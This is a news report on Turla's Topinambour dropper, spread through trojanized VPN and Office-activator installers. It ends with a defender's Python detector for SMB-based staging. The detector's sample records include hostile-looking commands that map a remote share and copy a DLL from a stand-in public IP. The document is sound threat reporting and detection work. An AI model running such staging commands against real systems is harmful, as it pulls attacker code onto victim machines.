The Turla APT has revamped its arsenal in 2019, creating new weapons and tools for targeting government entities. It’s now using booby-trapped anti-internet censorship software as an initial infection vector, suggesting Turla is going after dissident or other civil-society targets.
The Russian-speaking actors believed to be behind Turla named the dropper “Topinambour,” which is another word for the Jerusalem artichoke (a.k.a. the sunchoke). Since January, Topinambour has served as the first-stage implant in Turla campaigns. Once installed, it fetches all the other malware that the group uses to gain access to target networks and exfiltrate information.
“To deliver [the new modules] to targets, the operators use legitimate software installers infected with the Topinambour dropper,” researchers at Kaspersky wrote in a malware analysis on Monday. “These could be tools to circumvent internet censorship, such as Softether VPN 4.12 and psiphon3, or Microsoft Office activators.” The latter are exceptions to the anti-censorship ploys and are used by software pirates to activate the Microsoft Office suite without having to buy the actual product key.
The abuse of installation packs for VPN software, which can bypass internet censorship, suggests the attackers have clearly defined cyberespionage targets for these tools, the firm added.
Russian-speaking Turla (a.k.a. Snake, Venomous Bear, Waterbug and Uroboros) is known for spy campaigns targeting Western governments as well as embassies and consulates in post-Soviet states. It’s been active since at least 2014 (and possibly earlier) developing a range of custom backdoors to carry out its work. It continually evolves both in terms of malware and targets.
The Topinambour dropper contains what Kaspersky calls a “tiny .NET shell” that will wait for Windows shell commands from the command-and-control server (C2) and silently execute them. The C2 infrastructure is hosted on compromised WordPress sites and on cloud services.
“Using this and SMB shares on rented virtual private servers (VPS) [in South Africa], the campaign operators spread the next-stage modules using just ‘net use’ and ‘copy’ Windows shell commands,” the researchers noted.
The next-stage trojans upload, download and execute files, and fingerprint target systems. The PowerShell version of the trojan can also capture screenshots. They communicate with the C2 via an open SMB share on a remote CELL-C VPS in South Africa.
They also retrieve a final-stage, more complex trojan that can parse and execute custom commands from the C2, the researchers added. In the final stage of infection, this remote-administration trojan is stored, encrypted, in the computer’s registry, where the malware retrieves it when needed.
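A defender-side check for the staging step described above, where next-stage modules are pulled from a remote SMB share with nothing more than `net use` and `copy`. This is an added example, not code from Kaspersky or from this article: it runs over constructed Sysmon-style process-creation records and flags share-mapping or copy commands whose UNC path points at an IP outside the internal ranges listed in the code. The 203.0.113.0/24 address is a documentation range standing in for a public VPS; the field names and sample records are assumptions.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed Sysmon-style (Event ID 1) process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\203.0.113.10\shared /user:guest pass"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy \\203.0.113.10\shared\update.dll %TEMP%\update.dll"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use Z: \\10.0.0.5\finance /persistent:yes"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy C:\Users\a\report.docx \\fileserver01\public\ "},
    {"Image": r"C:\Program Files\Git\git.exe",
     "CommandLine": "git pull origin main"},
]

# Address space considered "inside": RFC 1918, loopback, link-local, IPv6 ULA.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# \\host\share  (host = IP literal or name; share stops at next backslash/space)
UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.:\-]+)\\([^\s\\]+)")
STAGING_VERBS = ("net use", "net.exe use", "copy ", "xcopy ", "robocopy ")

@dataclass
class Finding:
    command: str
    host: str
    share: str

def is_external_ip(host: str) -> bool:
    """True for an IP literal that lies outside INTERNAL_NETS; hostnames are not classified."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # plain hostname (e.g. fileserver01): leave to name-based checks
    return not any(addr in net for net in INTERNAL_NETS)

def find_remote_smb_staging(events):
    """Flag net use / copy-style commands whose UNC target is an external IP."""
    findings = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        if not any(verb in cmd.lower() for verb in STAGING_VERBS):
            continue
        for host, share in UNC_RE.findall(cmd):
            if is_external_ip(host):
                findings.append(Finding(cmd, host, share))
    return findings
```

On the constructed records only the two commands touching `\\203.0.113.10\shared` are returned; the RFC 1918 mapping and the copy to a named internal server are not.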